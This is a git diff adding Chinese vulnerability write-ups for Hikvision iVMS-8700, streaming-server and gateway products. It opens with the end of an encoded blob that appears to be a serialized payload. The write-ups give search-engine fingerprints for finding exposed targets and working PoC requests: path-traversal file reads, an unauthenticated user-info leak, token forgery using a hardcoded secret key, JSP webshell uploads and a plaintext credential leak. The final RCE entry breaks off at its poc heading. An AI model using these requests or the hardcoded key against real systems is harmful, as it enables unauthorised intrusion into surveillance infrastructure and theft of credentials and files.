$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}}
+```
+
+![1690419352458-1d78909f-8493-410c-89ec-acc1ec64a406.png](./img/3xCBZzWVsmcOpFHe/1690419352458-1d78909f-8493-410c-89ec-acc1ec64a406-127490.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yvgfr4gvmvbionwq>
\ No newline at end of file
diff --git a/海康威视iVMS-8700综合安防管理平台download任意文件下载.md b/海康威视iVMS-8700综合安防管理平台download任意文件下载.md
new file mode 100644
index 0000000..1c17c01
--- /dev/null
+++ b/海康威视iVMS-8700综合安防管理平台download任意文件下载.md
@@ -0,0 +1,32 @@
+# 海康威视 iVMS-8700综合安防管理平台 download 任意文件下载
+
+# 一、漏洞简介
+HIKVISION iVMS-8700综合安防管理平台存在任意文件读取漏洞，攻击者通过发送特定的请求包可以读取服务器中的敏感文件获取服务器信息
+
+# 二、影响版本
++ HIKVISION iVMS-8700综合安防管理平台
+
+# 三、资产测绘
++ hunter：`app.name=="Hikvision 海康威视 iVMS"`
+
+![1691846011747-3e390938-652e-4fe6-b38a-508a0b3213c5.png](./img/rCOOTOGt_2fSkyU3/1691846011747-3e390938-652e-4fe6-b38a-508a0b3213c5-829726.png)
+
++ 登录页面
+
+![1691846029356-5d70967f-a564-438d-9b21-de08e829d5aa.png](./img/rCOOTOGt_2fSkyU3/1691846029356-5d70967f-a564-438d-9b21-de08e829d5aa-705897.png)
+
+# 四、漏洞复现
+poc，token为`url+secretKeyIbuilding`进行MD5加密（**32位大写**）
+
+```plain
+/eps/api/triggerSnapshot/download?token=xxx&fileUrl=file:///C:/windows/win.ini&fileName=1 
+```
+
+![1691846212487-b9d3a53e-febe-4ceb-9974-87fbbf347f48.png](./img/rCOOTOGt_2fSkyU3/1691846212487-b9d3a53e-febe-4ceb-9974-87fbbf347f48-196042.png)
+
+![1691846233174-cb5861b5-fd91-4610-9d18-dc62ca069f13.png](./img/rCOOTOGt_2fSkyU3/1691846233174-cb5861b5-fd91-4610-9d18-dc62ca069f13-057686.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/okdesxq0iuq0sfkb>
\ No newline at end of file
diff --git a/海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md b/海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md
new file mode 100644
index 0000000..14902ff
--- /dev/null
+++ b/海康威视iVMS-8700综合安防管理平台getAllUserInfo存在信息泄露漏洞.md
@@ -0,0 +1,58 @@
+# 海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露漏洞
+
+# 一、漏洞简介
+  海康威视iVMS集中监控应用管理平台，是以安全防范业务应用为导向，以视频图像应用为基础手段，综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统，构建的多业务应用综合管理平台。海康威视iVMS-8700综合安防管理平台 getAllUserInfo存在信息泄露漏洞
+
+# 二、影响版本
++ 海康威视综合安防系统iVMS-5000
++ 海康威视综合安防系统 iVMS-8700
+
+# 三、资产测绘
++ hunter：`web.body="/views/home/file/installPackage.rar"`
+
+![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/KoSL1wq2hJloS7zP/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-838045.png)
+
++ 登录页面：
+
+![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/KoSL1wq2hJloS7zP/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-173197.png)
+
+# 四、漏洞复现
+```plain
+POST /services/IWsBaseService.IWsBaseServiceHttpSoap11Endpoint HTTP/1.1
+Host: {hostname}
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
+Content-Length: 569
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Authorization: Basic YWRtaW46MTIzNDU2
+Connection: close
+Connection: close
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:impl="http://impl.ws.api.base.cms.hikvision.com" xmlns:xsd="http://ws.common.cms.hikvision.com/xsd">
+<soapenv:Header/>
+<soapenv:Body>
+    <impl:getAllUserInfo>
+        <impl:request>
+            <!--type: int-->
+            <xsd:pageNo>1</xsd:pageNo>
+            <!--type: int-->
+            <xsd:pageSize>1</xsd:pageSize>
+        </impl:request>
+        <!--type: long-->
+        <impl:updTime></impl:updTime>
+    </impl:getAllUserInfo>
+</soapenv:Body>
+</soapenv:Envelope>
+```
+
+![1702650308771-920c2278-18dd-4f17-bc87-8b5a182f4e16.png](./img/KoSL1wq2hJloS7zP/1702650308771-920c2278-18dd-4f17-bc87-8b5a182f4e16-663215.png)
+
+nuclei脚本：
+
+[海康威视-ivms-8700-信息泄露.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709222237212-7f41ac18-a5a1-46d6-aa2e-960b2d07f2fd.yaml)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vlzpa0f6workvx4g>
\ No newline at end of file
diff --git a/海康威视iVMS-8700综合安防管理平台getPic任意文件上传.md b/海康威视iVMS-8700综合安防管理平台getPic任意文件上传.md
new file mode 100644
index 0000000..458240f
Binary files /dev/null and b/海康威视iVMS-8700综合安防管理平台getPic任意文件上传.md differ
diff --git a/海康威视iVMS-8700综合安防管理平台query存在硬编码漏洞.md b/海康威视iVMS-8700综合安防管理平台query存在硬编码漏洞.md
new file mode 100644
index 0000000..f23d56d
--- /dev/null
+++ b/海康威视iVMS-8700综合安防管理平台query存在硬编码漏洞.md
@@ -0,0 +1,41 @@
+# 海康威视iVMS-8700综合安防管理平台 query存在硬编码漏洞
+
+# 一、漏洞简介
+  海康威视iVMS集中监控应用管理平台，是以安全防范业务应用为导向，以视频图像应用为基础手段，综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统，构建的多业务应用综合管理平台。海康威视iVMS-8700综合安防管理平台 query存在硬编码漏洞。
+
+# 二、影响版本
++ 海康威视综合安防系统iVMS-5000
++ 海康威视综合安防系统 iVMS-8700
+
+# 三、资产测绘
++ hunter：`web.body="/views/home/file/installPackage.rar"`
+
+![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/5yqB1RcwhpNKCqwa/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-062927.png)
+
++ 登录页面：
+
+![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/5yqB1RcwhpNKCqwa/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-896124.png)
+
+# 四、漏洞复现
+```java
+GET /gisplatform/hikgis/query.html HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Cache-Control: no-cache
+```
+
+![1711372755485-c9d6f5bd-773e-4956-978f-26fa8800d026.png](./img/5yqB1RcwhpNKCqwa/1711372755485-c9d6f5bd-773e-4956-978f-26fa8800d026-512825.png)
+
+
+
+
+
+> 更新: 2024-06-01 11:04:36  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zv2apf24gb0ynffw>
\ No newline at end of file
diff --git a/海康威视iVMS-8700综合安防管理平台upload.action任意文件上传.md b/海康威视iVMS-8700综合安防管理平台upload.action任意文件上传.md
new file mode 100644
index 0000000..822e0f2
--- /dev/null
+++ b/海康威视iVMS-8700综合安防管理平台upload.action任意文件上传.md
@@ -0,0 +1,55 @@
+# 海康威视iVMS-8700综合安防管理平台 upload.action 任意文件上传
+
+# 一、漏洞简介
+  海康威视iVMS集中监控应用管理平台，是以安全防范业务应用为导向，以视频图像应用为基础手段，综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统，构建的多业务应用综合管理平台。HIKVISION iVMS-8700综合安防管理平台存在任意文件上传漏洞，攻击者通过发送特定的请求包可以上传Webshell文件控制服务器。
+
+# 二、影响版本
++ 海康威视综合安防系统iVMS-5000
++ 海康威视综合安防系统 iVMS-8700
+
+# 三、资产测绘
++ hunter：`web.body="/views/home/file/installPackage.rar"`
+
+![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/bWyBo5fSbGoz212v/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-912698.png)
+
++ 登录页面：
+
+![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/bWyBo5fSbGoz212v/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-920145.png)
+
+# 四、漏洞复现
+```plain
+POST /eps/resourceOperations/upload.action HTTP/1.1
+Host: xx.xx.xx.xx
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: MicroMessenger
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
+Content-Length: 212
+
+------WebKitFormBoundaryTJyhtTNqdMNLZLhj
+Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
+Content-Type: image/jpeg
+
+<%out.print("hello");%>
+------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
+```
+
+![1700226259831-01874e31-0fdb-4719-bd14-5f1e64019ea0.png](./img/bWyBo5fSbGoz212v/1700226259831-01874e31-0fdb-4719-bd14-5f1e64019ea0-358413.png)
+
+根据响应拼接上传文件地址
+
+```plain
+/eps/upload/ebaae9074e254f829c8de29bb5cfcb1c.jsp
+```
+
+![1700226291441-59c6dd72-c5c0-42be-9f28-e8861a960b9f.png](./img/bWyBo5fSbGoz212v/1700226291441-59c6dd72-c5c0-42be-9f28-e8861a960b9f-371534.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nut2noq5hg2uq96x>
\ No newline at end of file
diff --git a/海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md b/海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md
new file mode 100644
index 0000000..c4ea646
--- /dev/null
+++ b/海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞.md
@@ -0,0 +1,82 @@
+# 海康威视iVMS-8700综合安防系统resourceOperations任意文件上传漏洞
+
+# 一、漏洞简介
+  海康威视iVMS集中监控应用管理平台，是以安全防范业务应用为导向，以视频图像应用为基础手段，综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统，构建的多业务应用综合管理平台。攻击者通过获取密钥任意构造token，请求/resourceOperations/upload接口任意上传文件，导致获取服务器webshell权限，同时可远程进行恶意代码执行。
+
+# 二、影响版本
++ 海康威视综合安防系统iVMS-5000
++ 海康威视综合安防系统 iVMS-8700
+
+# 三、资产测绘
++ hunter：`web.body="/views/home/file/installPackage.rar"`
+
+![1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0.png](./img/kDLBwyHdk2d3W6A_/1691851218187-fa3d0a98-32b2-48ea-a294-7c7f565c20f0-110733.png)
+
++ 登录页面：
+
+![1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111.png](./img/kDLBwyHdk2d3W6A_/1691851119101-58fb28dd-18f8-4fca-b027-9931d8ce0111-046363.png)
+
+# 四、漏洞复现
+1. 访问`<font style="color:rgb(30, 107, 184);">/eps/api/resourceOperations/upload</font>`，发现token需要进行鉴权
+
+```plain
+POST /eps/api/resourceOperations/upload HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryGEJwjlojPo
+Cache-Control:max-age=0
+Connection:close
+Content-Length: 52
+
+service=http://xx.xx.xx.xx/home/index.action
+```
+
+![1691851435344-ed7479f5-f1be-43e6-aa67-2b85e942d1fa.png](./img/kDLBwyHdk2d3W6A_/1691851435344-ed7479f5-f1be-43e6-aa67-2b85e942d1fa-589948.png)
+
+2. 构造token绕过认证（内部机制：如果token值与请求url+secretkey的md5值相同就可以绕过认证）
+
+secretkey是代码里写死的（默认值：secretKeyIbuilding）
+
+token值需要进行MD5加密（32位大写）
+
+组合：token=MD5(url+"secretKeyIbuilding")
+
+```plain
+http://xx.xx.xx.xx/eps/api/resourceOperations/uploadsecretKeyIbuilding
+```
+
+![1691851562964-59ab6b79-59b0-4427-aa22-0724519c2287.png](./img/kDLBwyHdk2d3W6A_/1691851562964-59ab6b79-59b0-4427-aa22-0724519c2287-296469.png)
+
+3. 构造上传文件,上传成功且返回了resourceUuid值
+
+```plain
+POST /eps/api/resourceOperations/upload?token=DFB0D4034A82263A4DA9A37EB0DA687B HTTP/1.1
+Host: xx.xx.xx.xx
+Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryGEJwjlojPo
+Cache-Control:max-age=0
+Connection:close
+Content-Length: 178
+
+------WebKitFormBoundaryGEJwjlojPo
+Content-Disposition: form-data;name="fileUploader"; filename="test.jsp"
+Content-Type: image/jpeg
+
+1
+------WebKitFormBoundaryGEJwjlojPo--
+```
+
+![1691851646699-a986ea3a-d25a-45cb-bf5a-d639f1702215.png](./img/kDLBwyHdk2d3W6A_/1691851646699-a986ea3a-d25a-45cb-bf5a-d639f1702215-549185.png)
+
+4. 上传文件位置
+
+```plain
+http://xx.xx.xx.xx/eps/upload/resourceUuid的值.jsp
+```
+
+![1691851724492-57942c68-7154-45c5-b964-1cfb0b1fcb13.png](./img/kDLBwyHdk2d3W6A_/1691851724492-57942c68-7154-45c5-b964-1cfb0b1fcb13-384332.png)
+
+
+
+> 更新: 2024-02-29 23:57:17  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dxm9gap6g8zry92h>
\ No newline at end of file
diff --git a/海康威视流媒体管理服务器user.xml账号密码泄漏漏洞.md b/海康威视流媒体管理服务器user.xml账号密码泄漏漏洞.md
new file mode 100644
index 0000000..dff0d3a
--- /dev/null
+++ b/海康威视流媒体管理服务器user.xml账号密码泄漏漏洞.md
@@ -0,0 +1,34 @@
+# 海康威视流媒体管理服务器 user.xml 账号密码泄漏漏洞
+
+# 一、漏洞简介
+HIKVISION 流媒体管理服务器配置文件未做鉴权，攻击者通过漏洞可以获取网站账号密码
+
+# 二、影响版本
++ HIKVISION 流媒体管理服务器
+
+# 三、资产测绘
++ hunter：`web.body="流媒体管理服务器"&&web.body="杭州海康威视系统技术有限公司 版权所有"`
+
+![1691852350086-59553de6-b647-4dde-8c1b-77f90d88762d.png](./img/W2pLsDAqUjtLCdE8/1691852350086-59553de6-b647-4dde-8c1b-77f90d88762d-861201.png)
+
++ 登录页面
+
+![1691852369924-5fa9d9eb-7580-4355-bf97-6d42fcbf083f.png](./img/W2pLsDAqUjtLCdE8/1691852369924-5fa9d9eb-7580-4355-bf97-6d42fcbf083f-150590.png)
+
+# 四、漏洞复现
+```plain
+  /config/user.xml
+```
+
+![1691852415460-c3a7cb87-9703-4d03-b952-fbd260cb3f71.png](./img/W2pLsDAqUjtLCdE8/1691852415460-c3a7cb87-9703-4d03-b952-fbd260cb3f71-670431.png)
+
+账号密码为base64加密
+
+测试登录，登录成功
+
+![1691852465095-1abcb3c1-7dc6-4873-b8e8-a24ea2499ef4.png](./img/W2pLsDAqUjtLCdE8/1691852465095-1abcb3c1-7dc6-4873-b8e8-a24ea2499ef4-075512.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xz0uizp3x0yzr3kl>
\ No newline at end of file
diff --git a/海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md b/海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md
new file mode 100644
index 0000000..ef749b4
--- /dev/null
+++ b/海康威视视频编码设备接入网关showFile.php任意文件下载漏洞.md
@@ -0,0 +1,28 @@
+# 海康威视视频编码设备接入网关 showFile.php 任意文件下载漏洞
+
+# 一、漏洞简介
+海康威视视频接入网关系统在页面`/serverLog/showFile.php`的参数fileName存在任意文件下载漏洞
+
+# 二、影响版本
++ HIKVISION 视频编码设备接入网关
+
+# 三、资产测绘
++ hunter：`web.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"`
+
+![1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea.png](./img/yRD1Rk7vrCTRxiTa/1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea-234903.png)
+
++ 登录页面
+
+![1691857519082-eb318732-d51e-4393-89a9-7296293727ba.png](./img/yRD1Rk7vrCTRxiTa/1691857519082-eb318732-d51e-4393-89a9-7296293727ba-690646.png)
+
+# 四、漏洞复现
+```plain
+/serverLog/showFile.php?fileName=../web/html/main.php
+```
+
+![1691857555317-62dd3fcc-287a-40ea-9cb0-6f4d7a94351e.png](./img/yRD1Rk7vrCTRxiTa/1691857555317-62dd3fcc-287a-40ea-9cb0-6f4d7a94351e-655220.png)
+
+
+
+> 更新: 2024-02-29 23:57:18  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mq89stc9hxmf3fw1>
\ No newline at end of file
diff --git a/海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞.md b/海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞.md
new file mode 100644
index 0000000..5fa24bd
--- /dev/null
+++ b/海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞.md
@@ -0,0 +1,42 @@
+# 海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞
+
+# 一、漏洞简介
+海康威视视频编码设备接入网关userinfodata接口存在信息泄漏漏洞。
+
+# 二、影响版本
++ HIKVISION 视频编码设备接入网关
+
+# 三、资产测绘
++ hunter：`web.title="视频编码设备接入网关"&&app.name=="Hikvision 海康威视视频编码设备接入网关"`
+
+![1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea.png](./img/qV-R5KN1BBW4A5If/1691857505004-d8663f3c-62e3-4cac-8909-21305e690fea-364641.png)
+
++ 登录页面
+
+![1691857519082-eb318732-d51e-4393-89a9-7296293727ba.png](./img/qV-R5KN1BBW4A5If/1691857519082-eb318732-d51e-4393-89a9-7296293727ba-071734.png)
+
+# 四、漏洞复现
+```plain
+POST /data/userInfoData.php HTTP/1.1
+Host: 
+Content-Length: 38
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Origin:
+Referer:
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+page=1&rows=20&sort=userId&order=asc
+```
+
+![1711075731488-6717f765-229a-4079-a292-92c54ee39180.png](./img/qV-R5KN1BBW4A5If/1711075731488-6717f765-229a-4079-a292-92c54ee39180-702744.png)
+
+[hikvision-spbmjrwg-userinfodate-info.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1711075901506-37d4c294-7138-466e-b8bb-17d265f17fe6.yaml)
+
+
+
+> 更新: 2024-03-22 10:51:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zq2np1ubh0igzfoa>
\ No newline at end of file
diff --git a/海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936).md b/海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936).md
new file mode 100644
index 0000000..91d13a2
--- /dev/null
+++ b/海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936).md
@@ -0,0 +1,23 @@
+# 海康威视运行管理中心applyST远程代码执行漏洞(XVE-2024-33936)
+
+海康威视运行管理中心系统使用低版本的fastjson，攻击者可在未鉴权情况下获取服务器权限，且由于存在相关依赖，即使服务器不出网无法远程加载恶意类也可通过本地链直接命令执行，从而获取服务器权限。
+
+## fofa
+
+```javascript
+header="X-Content-Type-Options: nosniff" && body="<h1>Welcome to OpenResty!</h1>" && header="X-Xss-Protection: 1; mode=block"
+```
+
+## poc
